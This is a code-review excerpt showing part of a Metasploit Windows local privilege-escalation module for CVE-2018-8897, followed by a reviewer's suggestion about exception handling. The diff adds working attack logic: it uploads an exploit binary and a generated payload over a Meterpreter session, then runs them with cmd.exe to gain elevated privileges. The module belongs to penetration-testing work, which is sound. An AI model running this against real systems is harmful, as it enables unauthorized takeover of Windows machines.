modules/exploits/windows/local/mov_ss.rb

```diff
@@ -0,0 +1,174 @@
+      OptString.new('PATH',
+        [false, 'Path to write binaries (%TEMP% by default).', nil]),
+      OptInt.new('EXECUTE_DELAY',
+        [false, 'The number of seconds to delay before executing the exploit', 3])
+    ])
+  end
+
+  def setup
+    super
+    @exploit_name = datastore['EXPLOIT_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6))
+    @payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6))
+    @exploit_name = "#{exploit_name}.exe" unless exploit_name.match(/\.exe$/i)
+    @payload_name = "#{payload_name}.exe" unless payload_name.match(/\.exe$/i)
+    @temp_path = datastore['PATH'] || session.sys.config.getenv('TEMP')
+    @payload_path = "#{temp_path}\\#{payload_name}"
+    @exploit_path = "#{temp_path}\\#{exploit_name}"
+    @payload_exe = generate_payload_exe
+  end
+
+  def validate_active_host
+    begin
+      host = session.session_host
+      print_status("Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")
+    rescue Rex::Post::Meterpreter::RequestError => e
+      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
+      raise Msf::Exploit::Failed, 'Could not connect to session'
+    end
+  end
+
+  def validate_remote_path(path)
+    unless directory?(path)
+      fail_with(Failure::Unreachable, "#{path} does not exist on the target")
+    end
+  end
+
+  def validate_target
+    if sysinfo['Architecture'] == ARCH_X86
+      fail_with(Failure::NoTarget, 'Exploit code is 64-bit only')
+    end
+    if sysinfo['OS'] =~ /XP/
+      fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP')
+    end
+  end
+
+  def ensure_clean_destination(path)
+    if file?(path)
+      print_status("#{path} already exists on the target. Deleting...")
+      begin
+        file_rm(path)
+        print_status("Deleted #{path}")
+      rescue Rex::Post::Meterpreter::RequestError => e
+        elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
+        print_error("Unable to delete #{path}")
+      end
+    end
+  end
+
+  def ensure_clean_exploit_destination
+    ensure_clean_destination(exploit_path)
+  end
+
+  def ensure_clean_payload_destination
+    ensure_clean_destination(payload_path)
+  end
+
+  def upload_exploit
+    local_exploit_path = ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2018-8897-exe', 'cve-2018-8897-exe.exe')
+    upload_file(exploit_path, local_exploit_path)
+    print_status("Exploit uploaded on #{sysinfo['Computer']} to #{exploit_path}")
+  end
+
+  def upload_payload
+    write_file(payload_path, payload_exe)
+    print_status("Payload (#{payload_exe.length} bytes) uploaded on #{sysinfo['Computer']} to #{payload_path}")
+  end
+
+  def execute_exploit
+    sleep(datastore['EXECUTE_DELAY'])
+    print_status("Running exploit #{exploit_path} with payload #{payload_path}")
+    output = cmd_exec('cmd.exe', "/c #{exploit_path} #{payload_path}")
+    vprint_status(output)
+  end
+
+  def exploit
+    begin
```

Comment:
Using the rescue-from-method technique would be cleaner than wrapping the method in a begin/rescue block.

```ruby
def exploit
  # ...
rescue Rex::Post::Meterpreter::RequestError => e
  elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
  print_error(e.message)
  ensure_clean_exploit_destination
  ensure_clean_payload_destination
end
```